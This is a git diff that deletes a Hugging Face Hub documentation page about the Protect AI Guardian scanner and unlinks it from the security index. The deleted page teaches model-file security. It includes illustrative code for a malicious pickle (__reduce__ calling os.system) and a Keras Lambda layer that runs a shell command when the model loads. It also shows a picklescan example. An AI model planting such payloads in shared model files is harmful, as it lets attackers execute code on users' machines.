diff --git a/docs/hub/security-protectai.md b/docs/hub/security-protectai.md
deleted file mode 100644
index 6d1dc092f..000000000
--- a/docs/hub/security-protectai.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Third-party scanner: Protect AI
-
-
-*Interested in joining our security partnership / providing scanning information on the Hub? Please get in touch with us over at security@huggingface.co.*
-
-
-[Protect AI](https://protectai.com/)'s [Guardian](https://protectai.com/guardian) catches pickle, Keras, and other exploits, as detailed on their [Knowledge Base page](https://protectai.com/insights/knowledge-base/). Guardian also benefits from reports submitted by the bounty-hunter community at [Huntr](https://huntr.com/).
-
-![Protect AI report for the danger.dat file contained in mcpotato/42-eicar-street](https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/hub/protect-ai-report.png)
-*Example of a report for [danger.dat](https://huggingface.co/mcpotato/42-eicar-street/blob/main/danger.dat)*
-
-We have partnered with Protect AI to provide scanning and make the Hub safer. Just as files are scanned by our internal scanning system, files in public repositories are scanned by Guardian.
-
-Our frontend has been redesigned specifically for this purpose, to accommodate new scanners.
-
-
-
-Here is an example repository you can check out to see the feature in action: [mcpotato/42-eicar-street](https://huggingface.co/mcpotato/42-eicar-street).
-
-## Model security refresher
-
-To share models, we serialize the data structures we use to interact with them, in order to facilitate storage and transport. Some serialization formats are vulnerable to nasty exploits, such as arbitrary code execution (looking at you, pickle), which makes sharing models potentially dangerous.
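-
-To make the risk concrete, here is a minimal sketch of a malicious pickle (the class name and `echo` payload are illustrative, not a real sample):
-
-```python
-import os
-import pickle
-
-class Malicious:
-    # pickle calls __reduce__ to decide how to rebuild an object; returning
-    # (os.system, (command,)) makes *deserialization* run that command.
-    def __reduce__(self):
-        return (os.system, ("echo arbitrary code execution",))
-
-payload = pickle.dumps(Malicious())
-
-# Anyone who loads this blob executes the attacker's command:
-pickle.loads(payload)
-```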
-
-As Hugging Face has become a popular platform for model sharing, we want to protect the community from these exploits, which is why we have developed tools like [picklescan](https://github.com/mmaitre314/picklescan) and why we integrate third-party scanners.
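-
-Before loading an untrusted pickle-based checkpoint, you can also run picklescan on it yourself. A minimal sketch, assuming picklescan's `scan_file_path` helper and a hypothetical local file path (check the project's README for the current API):
-
-```python
-from picklescan.scanner import scan_file_path
-
-# Statically scan the pickle stream *before* ever unpickling it; the scan
-# reports suspicious imports (e.g. os.system) without executing anything.
-result = scan_file_path("downloads/pytorch_model.bin")
-print(result.issues_count)  # attribute name as in picklescan's source at the time of writing
-```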
-
-Pickle is not the only exploitable format out there; [see for reference](https://github.com/Azure/counterfit/wiki/Abusing-ML-model-file-formats-to-create-malware-on-AI-systems:-A-proof-of-concept) how one can exploit Keras Lambda layers to achieve arbitrary code execution.
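-
-A minimal sketch of that Keras vector (file name and `echo` payload are illustrative; exact save/load behavior varies across Keras versions, with recent ones refusing to deserialize Lambda code unless `safe_mode=False` is passed):
-
-```python
-import tensorflow as tf
-
-# A Lambda layer wraps arbitrary Python; the function is serialized together
-# with the model, so the saved artifact carries attacker-controlled code.
-def exploit(x):
-    import os
-    os.system("echo arbitrary code execution")  # illustrative payload
-    return x
-
-model = tf.keras.Sequential([tf.keras.Input(shape=(1,)), tf.keras.layers.Lambda(exploit)])
-model.save("innocuous.keras")
-
-# On the victim's machine: recent Keras blocks Lambda deserialization by
-# default, but opting out (or using an older version) brings the code back.
-loaded = tf.keras.models.load_model("innocuous.keras", safe_mode=False)
-loaded.predict(tf.ones((1, 1)))  # running inference executes the payload
-```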
-
diff --git a/docs/hub/security.md b/docs/hub/security.md
index a4190a6eb..a90e94a3c 100644
--- a/docs/hub/security.md
+++ b/docs/hub/security.md
@@ -20,5 +20,4 @@ For any other security questions, please feel free to send us an email at securi
- [Malware Scanning](./security-malware)
- [Pickle Scanning](./security-pickle)
- [Secrets Scanning](./security-secrets)
-- [Third-party scanner: Protect AI](./security-protectai)
- [Resource Groups](./security-resource-groups)